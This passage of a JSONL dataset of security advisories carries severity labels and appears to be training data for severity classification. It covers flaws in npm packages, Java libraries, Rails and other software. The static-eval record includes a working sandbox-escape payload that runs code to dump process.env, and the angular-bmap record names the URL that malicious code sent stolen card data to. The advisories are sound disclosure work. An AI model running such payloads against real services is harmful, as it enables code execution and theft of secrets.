be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository. Maven is changing the default behavior in 3.8.1+ to no longer follow http (non-SSL) repository references by default. More details available in the referenced urls. If you are currently using a repository manager to govern the repositories used by your builds, you are unaffected by the risks present in the legacy behavior, and are unaffected by this vulnerability and change to default behavior. See this link for more information about repository management: https://maven.apache.org/repository-management.html", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-06-16", "split": "train"} -{"id": "fb23a4590da9796c2790", "text": "Go Ethereum Denial of Service\n\n`cmd/evm/runner.go` in Go Ethereum (aka geth) allows attackers to cause a denial of service (SEGV) via crafted bytecode.\n### Specific Go Packages Affected\ngithub.com/ethereum/go-ethereum/cmd/evm", "text_raw": "Go Ethereum Denial of Service\n\n[Severity: HIGH]\n\n`cmd/evm/runner.go` in Go Ethereum (aka geth) allows attackers to cause a denial of service (SEGV) via crafted bytecode.\n### Specific Go Packages Affected\ngithub.com/ethereum/go-ethereum/cmd/evm", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-29", "split": "train"} -{"id": "61b644f2e53bc6e8f3fc", "text": "The NPM package `flatmap-stream` is considered malicious. A malicious actor added this package as a dependency to the NPM `event-stream` package in version `3.3.6`. Users of `event-stream` are encouraged to downgrade to the last non-malicious version, `3.3.4`, or upgrade to the latest 4.x version.\n\nUsers of `flatmap-stream` are encouraged to remove the dependency entirely.", "text_raw": "Critical severity vulnerability that affects event-stream and flatmap-stream\n\n[Severity: CRITICAL]\n\nThe NPM package `flatmap-stream` is considered malicious. A malicious actor added this package as a dependency to the NPM `event-stream` package in version `3.3.6`. Users of `event-stream` are encouraged to downgrade to the last non-malicious version, `3.3.4`, or upgrade to the latest 4.x version. \n\nUsers of `flatmap-stream` are encouraged to remove the dependency entirely.\n", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-11-26", "split": "train"} -{"id": "af0595f6881cedde41e1", "text": "jackson-databind mishandles the interaction between serialization gadgets and typing\n\nFasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).", "text_raw": "jackson-databind mishandles the interaction between serialization gadgets and typing\n\n[Severity: CRITICAL]\n\nFasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-04-23", "split": "train"} -{"id": "6e141c30e4123efe3fd6", "text": "Constructr CMS 3.03 Multiple Remote Vulnerabilities (XSS/SQLi)", "text_raw": "Constructr CMS 3.03 Multiple Remote Vulnerabilities (XSS/SQLi)\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-03-11", "split": "train"} -{"id": "f7de67da11fc85ea72d3", "text": "Regression in JWT Signature Validation\n\n### Overview\nVersions after and including `2.3.0` are improperly validating the JWT token signature when using the `JWTValidator.verify` method. Improper validation of the JWT token signature when not using the default Authorization Code Flow can allow an attacker to bypass authentication and authorization.\n\n### Am I affected?\nYou are affected by this vulnerability if all of the following conditions apply:\n\n- You are using `omniauth-auth0`.\n- You are using `JWTValidator.verify` method directly OR you are not authenticating using the SDK’s default Authorization Code Flow.\n\n### How to fix that?\nUpgrade to version `2.4.1`.\n\n### Will this update impact my users?\nThe fix provided in this version will not affect your users.", "text_raw": "Regression in JWT Signature Validation\n\n[Severity: HIGH]\n\n### Overview\nVersions after and including `2.3.0` are improperly validating the JWT token signature when using the `JWTValidator.verify` method. Improper validation of the JWT token signature when not using the default Authorization Code Flow can allow an attacker to bypass authentication and authorization.\n\n### Am I affected?\nYou are affected by this vulnerability if all of the following conditions apply:\n\n- You are using `omniauth-auth0`.\n- You are using `JWTValidator.verify` method directly OR you are not authenticating using the SDK’s default Authorization Code Flow.\n\n### How to fix that?\nUpgrade to version `2.4.1`.\n\n### Will this update impact my users?\nThe fix provided in this version will not affect your users.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-11-03", "split": "train"} -{"id": "19b5066a781d81f34744", "text": "espeak-ruby allows arbitrary command execution\n\nThe espeak-ruby gem before 1.0.3 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a string to the `speak`, `save`, `bytes` or `bytes_wav` method in `lib/espeak/speech.rb`.", "text_raw": "espeak-ruby allows arbitrary command execution\n\n[Severity: CRITICAL]\n\nThe espeak-ruby gem before 1.0.3 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a string to the `speak`, `save`, `bytes` or `bytes_wav` method in `lib/espeak/speech.rb`.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "df4525bdde041fd8ea02", "text": "Improper Input Validation and Code Injection in pdf-image\n\nLack of input validation in pdf-image npm package version <= 2.0.0 may allow an attacker to run arbitrary code if PDF file path is constructed based on untrusted user input.", "text_raw": "Improper Input Validation and Code Injection in pdf-image\n\n[Severity: HIGH]\n\nLack of input validation in pdf-image npm package version <= 2.0.0 may allow an attacker to run arbitrary code if PDF file path is constructed based on untrusted user input.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-10", "split": "train"} -{"id": "7ace3ee53ef0e82b87ab", "text": "actionmailer email address processing causes Denial of service\n\nMultiple format string vulnerabilities in log_subscriber.rb files in the log subscriber component in Action Mailer in Ruby on Rails 3.x before 3.2.15 allow remote attackers to cause a denial of service via a crafted e-mail address that is improperly handled during construction of a log message.", "text_raw": "actionmailer email address processing causes Denial of service\n\n[Severity: MEDIUM]\n\nMultiple format string vulnerabilities in log_subscriber.rb files in the log subscriber component in Action Mailer in Ruby on Rails 3.x before 3.2.15 allow remote attackers to cause a denial of service via a crafted e-mail address that is improperly handled during construction of a log message.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "4e1ad9f4b9b5cf7a0fa3", "text": "In Apache PDFBox a carefully crafted PDF file can trigger an extremely long running computation\n\nIn Apache PDFBox 1.8.0 to 1.8.15 and 2.0.0RC1 to 2.0.11, a carefully crafted PDF file can trigger an extremely long running computation when parsing the page tree.", "text_raw": "In Apache PDFBox a carefully crafted PDF file can trigger an extremely long running computation\n\n[Severity: MEDIUM]\n\nIn Apache PDFBox 1.8.0 to 1.8.15 and 2.0.0RC1 to 2.0.11, a carefully crafted PDF file can trigger an extremely long running computation when parsing the page tree.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "b83640a42f43d8390e15", "text": "Persistent XSS in newsletter module in Shopware\n\n### Impact\nPersistent XSS in newsletter module\n\n### Patches\n\nWe recommend updating to the current version 5.6.9. You can get the update to 5.6.9 regularly via the Auto-Updater or directly via the download overview.\n\nFor older versions you can use the Security Plugin:\nhttps://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html\n\n### References\nhttps://docs.shopware.com/en/shopware-5-en/security-updates/security-update-11-2020", "text_raw": "Persistent XSS in newsletter module in Shopware\n\n[Severity: LOW]\n\n### Impact\nPersistent XSS in newsletter module\n\n### Patches\n\nWe recommend updating to the current version 5.6.9. You can get the update to 5.6.9 regularly via the Auto-Updater or directly via the download overview.\n\nFor older versions you can use the Security Plugin:\nhttps://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html\n\n### References\nhttps://docs.shopware.com/en/shopware-5-en/security-updates/security-update-11-2020", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-11-13", "split": "train"} -{"id": "7e30e2071b7a4d1e5db6", "text": "Malicious Package in angular-bmap\n\nVersion 0.0.9 of `angular-bmap` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n## Recommendation\n\nIf version 0.0.9 of this module is found installed you will want to replace it with a version before or after 0.0.9. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.", "text_raw": "Malicious Package in angular-bmap\n\n[Severity: CRITICAL]\n\nVersion 0.0.9 of `angular-bmap` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n\n## Recommendation\n\nIf version 0.0.9 of this module is found installed you will want to replace it with a version before or after 0.0.9. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "5476e1ee01fbe93558c4", "text": "OS Command Injection in Rake\n\nThere is an OS command injection vulnerability in Ruby Rake before 12.3.3 in `Rake::FileList` when supplying a filename that begins with the pipe character `|`.", "text_raw": "OS Command Injection in Rake\n\n[Severity: MEDIUM]\n\nThere is an OS command injection vulnerability in Ruby Rake before 12.3.3 in `Rake::FileList` when supplying a filename that begins with the pipe character `|`.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-02-28", "split": "train"} -{"id": "3f971d9fe23501207570", "text": "showdoc is vulnerable to Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)\n\nshowdoc is vulnerable to Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG).", "text_raw": "showdoc is vulnerable to Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)\n\n[Severity: MEDIUM]\n\nshowdoc is vulnerable to Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-03", "split": "train"} -{"id": "5cc5234068bb28ae3821", "text": "WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities", "text_raw": "WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2015-04-14", "split": "train"} -{"id": "51ffd295e7ad8b991987", "text": "Embedthis Appweb Web Server 3.2.2-1 (Ejscript) Remote XSS Vulnerability", "text_raw": "Embedthis Appweb Web Server 3.2.2-1 (Ejscript) Remote XSS Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2010-12-23", "split": "train"} -{"id": "20f78df6034be191757c", "text": "Denial of Service in @commercial/ammo\n\nVersions of `@commercial/ammo` prior to 2.1.1 are vulnerable to Denial of Service. The Range HTTP header parser has a vulnerability which will cause the function to throw a system error if the header is set to an invalid value. Because hapi is not expecting the function to ever throw, the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.\n\n## Recommendation\n\nUpgrade to version 2.1.1 or later.", "text_raw": "Denial of Service in @commercial/ammo\n\n[Severity: HIGH]\n\nVersions of `@commercial/ammo` prior to 2.1.1 are vulnerable to Denial of Service. The Range HTTP header parser has a vulnerability which will cause the function to throw a system error if the header is set to an invalid value. Because hapi is not expecting the function to ever throw, the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.\n\n\n## Recommendation\n\nUpgrade to version 2.1.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "9b21f6eba863c5400469", "text": "Trend Micro Multiple Products Content Validation Escape Vulnerability\n\nAffected: Trend Micro Apex One, OfficeScan and Worry-Free Business Security Agents\n\nTrend Micro Apex One, OfficeScan, and Worry-Free Business Security agents contain a content validation escape vulnerability that could allow an attacker to manipulate certain agent client components.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-74\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Trend Micro Multiple Products Content Validation Escape Vulnerability\n\nAffected: Trend Micro Apex One, OfficeScan and Worry-Free Business Security Agents\n\nTrend Micro Apex One, OfficeScan, and Worry-Free Business Security agents contain a content validation escape vulnerability that could allow an attacker to manipulate certain agent client components.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-74\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "33fae599292ef84a3069", "text": "Symlink reference outside of node_modules in bin-links\n\nVersions of `bin-links` prior to 1.1.5 are vulnerable to a Symlink reference outside of node_modules. It is possible to create symlinks to files outside of the`node_modules` folder through the `bin` field. This may allow attackers to access unauthorized files.\n\n## Recommendation\n\nUpgrade to version 1.1.5 or later.", "text_raw": "Symlink reference outside of node_modules in bin-links\n\n[Severity: LOW]\n\nVersions of `bin-links` prior to 1.1.5 are vulnerable to a Symlink reference outside of node_modules. It is possible to create symlinks to files outside of the`node_modules` folder through the `bin` field. This may allow attackers to access unauthorized files.\n\n\n## Recommendation\n\nUpgrade to version 1.1.5 or later.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "4b796c9077284ae08513", "text": "Path Traversal in bruteser\n\nVersions of `bruteser` prior to 0.1.0 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.\n\n## Recommendation\n\nUpgrade to version 0.1.0 or later.", "text_raw": "Path Traversal in bruteser\n\n[Severity: HIGH]\n\nVersions of `bruteser` prior to 0.1.0 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.\n\n\n## Recommendation\n\nUpgrade to version 0.1.0 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "945ddf37013cadc9d15c", "text": "Wrong memory orderings violates mutual exclusion in spin\n\nWrong memory orderings inside the RwLock implementation allow for two writers to acquire the lock at the same time. The drop implementation used Ordering::Relaxed, which allows the compiler or CPU to reorder a mutable access on the locked data after the lock has been yielded.\n\nOnly users of the RwLock implementation are affected. Users of Once (including users of lazy_static with the spin_no_std feature enabled) are NOT affected.\n\nOn strongly ordered CPU architectures like x86, the only real way that this would lead to a memory corruption is if the compiler reorders an access after the lock is yielded, which is possible but in practice unlikely. It is a more serious issue on weakly ordered architectures such as ARM which, except in the presence of certain instructions, allow the hardware to decide which accesses are seen at what times. Therefore on an ARM system it is likely that using the wrong memory ordering would result in a memory corruption, even if the compiler itself doesn't reorder the memory accesses in a buggy way.", "text_raw": "Wrong memory orderings violates mutual exclusion in spin\n\n[Severity: HIGH]\n\nWrong memory orderings inside the RwLock implementation allow for two writers to acquire the lock at the same time. The drop implementation used Ordering::Relaxed, which allows the compiler or CPU to reorder a mutable access on the locked data after the lock has been yielded.\n\nOnly users of the RwLock implementation are affected. Users of Once (including users of lazy_static with the spin_no_std feature enabled) are NOT affected.\n\nOn strongly ordered CPU architectures like x86, the only real way that this would lead to a memory corruption is if the compiler reorders an access after the lock is yielded, which is possible but in practice unlikely. It is a more serious issue on weakly ordered architectures such as ARM which, except in the presence of certain instructions, allow the hardware to decide which accesses are seen at what times. Therefore on an ARM system it is likely that using the wrong memory ordering would result in a memory corruption, even if the compiler itself doesn't reorder the memory accesses in a buggy way.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "92bf1879a9072a1c7a44", "text": "Malicious Package in smartsearchwp\n\nAll versions of `smartsearchwp` contain malicious code. The package is malware intended to steal credentials from websites it is loaded in. It traverses DOM elements looking for fields such as `username` and `password` and uploads it to a remote server. The package also port-scans the local gateway and uploads the information to the remote server. It has a feature to fetch commands from the remote server and execute them with `eval`. The npm security team analysis found several bugs in the malware that prevent it from actually performing its actions. The malicious code is also not invoked upon installation or require; it would require transpiling TypeScript code and using it in a website.\n\n## Recommendation\n\nRemove the package from your environment. There is no indication of further compromise.", "text_raw": "Malicious Package in smartsearchwp\n\n[Severity: CRITICAL]\n\nAll versions of `smartsearchwp` contain malicious code. The package is malware intended to steal credentials from websites it is loaded in. It traverses DOM elements looking for fields such as `username` and `password` and uploads it to a remote server. The package also port-scans the local gateway and uploads the information to the remote server. It has a feature to fetch commands from the remote server and execute them with `eval`. The npm security team analysis found several bugs in the malware that prevent it from actually performing its actions. The malicious code is also not invoked upon installation or require; it would require transpiling TypeScript code and using it in a website.\n\n\n\n## Recommendation\n\nRemove the package from your environment. There is no indication of further compromise.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "71cad720a5f431e8a103", "text": "ECOA Building Automation System Weak Default Credentials", "text_raw": "ECOA Building Automation System Weak Default Credentials\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2021-09-08", "split": "train"} -{"id": "7882e3538e99e57321ee", "text": "Improper Input Validation in Symfony\n\nAn issue was discovered in Symfony before 4.2.12 and 4.3.x before 4.3.8. The VarExport component incorrectly escapes strings, allowing some specially crafted ones to escalate to execution of arbitrary PHP code. This is related to symfony/var-exporter.", "text_raw": "Improper Input Validation in Symfony\n\n[Severity: CRITICAL]\n\nAn issue was discovered in Symfony before 4.2.12 and 4.3.x before 4.3.8. The VarExport component incorrectly escapes strings, allowing some specially crafted ones to escalate to execution of arbitrary PHP code. This is related to symfony/var-exporter.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-02-12", "split": "train"} -{"id": "ee15b2749be761306f8e", "text": "SharpLynx v9.2.3 Insecure File Permissions", "text_raw": "SharpLynx v9.2.3 Insecure File Permissions\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2018-04-02", "split": "train"} -{"id": "5ac248397cfbe7ab484c", "text": "Improper Input Validation in renderdoc\n\nAffected versions of this crate exposed several methods which took self by immutable reference, despite the requesting the RenderDoc API to set a mutable value internally. This is technically unsound and calling these methods from multiple threads without synchronization could lead to unexpected and unpredictable behavior. The flaw was corrected in release 0.5.0.", "text_raw": "Improper Input Validation in renderdoc\n\n[Severity: CRITICAL]\n\nAffected versions of this crate exposed several methods which took self by immutable reference, despite the requesting the RenderDoc API to set a mutable value internally. This is technically unsound and calling these methods from multiple threads without synchronization could lead to unexpected and unpredictable behavior. The flaw was corrected in release 0.5.0.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "888ead2054b870751190", "text": "HomeAutomation v3.3.2 Authentication Bypass Exploit", "text_raw": "HomeAutomation v3.3.2 Authentication Bypass Exploit\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2019-12-29", "split": "train"} -{"id": "c1ee0f6e380c1379abaf", "text": "Directory traversal in Rack::Directory app bundled with Rack\n\nA directory traversal vulnerability exists in rack < 2.2.0 that allows an attacker perform directory traversal vulnerability in the Rack::Directory app that is bundled with Rack which could result in information disclosure.", "text_raw": "Directory traversal in Rack::Directory app bundled with Rack\n\n[Severity: HIGH]\n\nA directory traversal vulnerability exists in rack < 2.2.0 that allows an attacker perform directory traversal vulnerability in the Rack::Directory app that is bundled with Rack which could result in information disclosure.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-07-06", "split": "train"} -{"id": "ada9f3d069434fb5ac8a", "text": "Information exposure in elgg\n\nelgg is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor. Forms in the view namespace 'forms/admin' were not protected by an AdminGatekeeper in case of AJAX requests to 'ajax/form/admin/'.", "text_raw": "Information exposure in elgg\n\n[Severity: HIGH]\n\nelgg is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor. Forms in the view namespace 'forms/admin' were not protected by an AdminGatekeeper in case of AJAX requests to 'ajax/form/admin/'.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-16", "split": "train"} -{"id": "d383f716adbca8ee8b19", "text": "radiant vulnerable to Cross-site Scripting\n\nThere are multiple Persistent XSS vulnerabilities in Radiant CMS 1.1.4. They affect Personal Preferences (Name and Username) and Configuration (Site Title, Dev Site Domain, Page Parts, and Page Fields).", "text_raw": "radiant vulnerable to Cross-site Scripting\n\n[Severity: MEDIUM]\n\nThere are multiple Persistent XSS vulnerabilities in Radiant CMS 1.1.4. They affect Personal Preferences (Name and Username) and Configuration (Site Title, Dev Site Domain, Page Parts, and Page Fields).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-07-27", "split": "train"} -{"id": "c0b3321102c636a4259a", "text": "Internal exception message exposure for login action in Sylius\n\n## Internal exception message exposure for login action\n\n### Impact\nException messages from internal exceptions (like database exception) are wrapped by `\\Symfony\\Component\\Security\\Core\\Exception\\AuthenticationServiceException` and propagated through the system to UI. Therefore, some internal system information may leak and be visible to the customer.\n\nA validation message with the exception details will be presented to the user when one will try to log into the shop.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\nThe `src/Sylius/Bundle/UiBundle/Resources/views/Security/_login.html.twig` file should be overridden and lines https://github.com/Sylius/Sylius/blob/1.4/src/Sylius/Bundle/UiBundle/Resources/views/Security/_login.html.twig#L13-L17 should be replaced with\n```twig\n {% if last_error %}\n
\n {{ messages.error(last_error.messageKey) }}\n
\n {% endif %}\n```\n\nThe `messageKey` field should be used instead of the `message`.", "text_raw": "Internal exception message exposure for login action in Sylius\n\n[Severity: LOW]\n\n## Internal exception message exposure for login action\n\n### Impact\nException messages from internal exceptions (like database exception) are wrapped by `\\Symfony\\Component\\Security\\Core\\Exception\\AuthenticationServiceException` and propagated through the system to UI. Therefore, some internal system information may leak and be visible to the customer. \n\nA validation message with the exception details will be presented to the user when one will try to log into the shop. \n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\nThe `src/Sylius/Bundle/UiBundle/Resources/views/Security/_login.html.twig` file should be overridden and lines https://github.com/Sylius/Sylius/blob/1.4/src/Sylius/Bundle/UiBundle/Resources/views/Security/_login.html.twig#L13-L17 should be replaced with\n```twig\n {% if last_error %}\n
\n {{ messages.error(last_error.messageKey) }}\n
\n {% endif %}\n``` \n\nThe `messageKey` field should be used instead of the `message`.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2019-12-05", "split": "train"} -{"id": "a66fdbd996645efe8416", "text": "Marked ReDoS due to email addresses being evaluated in quadratic time\n\nVersions of `marked` from 0.3.14 until 0.6.2 are vulnerable to Regular Expression Denial of Service. Email addresses may be evaluated in quadratic time, allowing attackers to potentially crash the node process due to resource exhaustion.\n\n## Recommendation\n\nUpgrade to version 0.6.2 or later.", "text_raw": "Marked ReDoS due to email addresses being evaluated in quadratic time\n\n[Severity: MEDIUM]\n\nVersions of `marked` from 0.3.14 until 0.6.2 are vulnerable to Regular Expression Denial of Service. Email addresses may be evaluated in quadratic time, allowing attackers to potentially crash the node process due to resource exhaustion.\n\n\n## Recommendation\n\nUpgrade to version 0.6.2 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-06-05", "split": "train"} -{"id": "f9d621db07613cab39dc", "text": "Improper Handling of Length Parameter Inconsistency in Apache Ant\n\nWhen reading a specially crafted TAR archive an Apache Ant build can be made to allocate large amounts of memory that finally leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Apache Ant prior to 1.9.16 and 1.10.11 were affected.", "text_raw": "Improper Handling of Length Parameter Inconsistency in Apache Ant\n\n[Severity: MEDIUM]\n\nWhen reading a specially crafted TAR archive an Apache Ant build can be made to allocate large amounts of memory that finally leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Apache Ant prior to 1.9.16 and 1.10.11 were affected.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-02", "split": "train"} -{"id": "1ee64afbf7fb550f2d8f", "text": "Sandbox Breakout / Arbitrary Code Execution in static-eval\n\nVersions of `static-eval`prior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.\n\n## Proof of concept\n```\nvar evaluate = require('static-eval');\nvar parse = require('esprima').parse;\n\nvar src = process.argv[2];\nvar payload = '(function({x}){return x.constructor})({x:\"\".sub})(\"console.log(process.env)\")()'\nvar ast = parse(payload).body[0].expression;\nconsole.log(evaluate(ast, {x:1}));\n```\n\n## Recommendation\n\nUpgrade to version 2.0.2 or later.", "text_raw": "Sandbox Breakout / Arbitrary Code Execution in static-eval\n\n[Severity: HIGH]\n\nVersions of `static-eval`prior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.\n\n## Proof of concept\n```\nvar evaluate = require('static-eval');\nvar parse = require('esprima').parse;\n\nvar src = process.argv[2];\nvar payload = '(function({x}){return x.constructor})({x:\"\".sub})(\"console.log(process.env)\")()'\nvar ast = parse(payload).body[0].expression;\nconsole.log(evaluate(ast, {x:1}));\n```\n\n\n## Recommendation\n\nUpgrade to version 2.0.2 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "21bca0bffc7ed59d7e2c", "text": "SSRF in adminer\n\n### Impact\nUsers of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.\n\n### Patches\nPatched by ccd2374b, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9).\n\n### Workarounds\n* Use a single driver version (e.g. `adminer-mysql.php`).\n* Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/).\n\n### References\nhttps://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Comment at ccd2374b.", "text_raw": "SSRF in adminer\n\n[Severity: HIGH]\n\n### Impact\nUsers of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.\n\n### Patches\nPatched by ccd2374b, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9).\n\n### Workarounds\n* Use a single driver version (e.g. `adminer-mysql.php`).\n* Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/).\n\n### References\nhttps://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Comment at ccd2374b.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-02-11", "split": "train"} -{"id": "20edbf004149e03c821c", "text": "Path Traversal in m-server\n\nVersions of `m-server` before 1.4.2 are vulnerable to path traversal allowing a remote attacker to display content of arbitrary files from the server.\n\n## Recommendation\n\nUpdate to version 1.4.2 or later.", "text_raw": "Path Traversal in m-server\n\n[Severity: MEDIUM]\n\nVersions of `m-server` before 1.4.2 are vulnerable to path traversal allowing a remote attacker to display content of arbitrary files from the server.\n\n\n## Recommendation\n\nUpdate to version 1.4.2 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-06-11", "split": "train"} -{"id": "06afbd03677257a4bb58", "text": "Path Traversal in localhost-now\n\nVersions of `localhost-now` before 1.0.2 are vulnerable to path traversal. This allows a remote attacker to read the content of an arbitrary file.\n\n## Recommendation\n\nUpdate to version 1.0.2 or later.", "text_raw": "Path Traversal in localhost-now\n\n[Severity: HIGH]\n\nVersions of `localhost-now` before 1.0.2 are vulnerable to path traversal. This allows a remote attacker to read the content of an arbitrary file.\n\n\n## Recommendation\n\nUpdate to version 1.0.2 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-25", "split": "train"} -{"id": "0ac300fecc9f802a6267", "text": "Cross-site scripting in demos/demo.mysqli.php in getID3\n\nCross-site scripting (XSS) vulnerability in demos/demo.mysqli.php in getID3 1.X and v2.0.0-beta allows remote attackers to inject arbitrary web script or HTML via the showtagfiles parameter.", "text_raw": "Cross-site scripting in demos/demo.mysqli.php in getID3\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in demos/demo.mysqli.php in getID3 1.X and v2.0.0-beta allows remote attackers to inject arbitrary web script or HTML via the showtagfiles parameter.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-04", "split": "train"} -{"id": "e7bc7c07c940ca708966", "text": "Polymorphic Typing in FasterXML jackson-databind\n\nA Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.", "text_raw": "Polymorphic Typing in FasterXML jackson-databind\n\n[Severity: CRITICAL]\n\nA Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-10-28", "split": "train"} -{"id": "6059e24bb47639151279", "text": "VMware vCenter Server Improper Input Validation Vulnerability\n\nAffected: VMware vCenter Server\n\nVMware vSphere Client contains an improper input validation vulnerability in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server, which allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-20, CWE-470, CWE-918\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "VMware vCenter Server Improper Input Validation Vulnerability\n\nAffected: 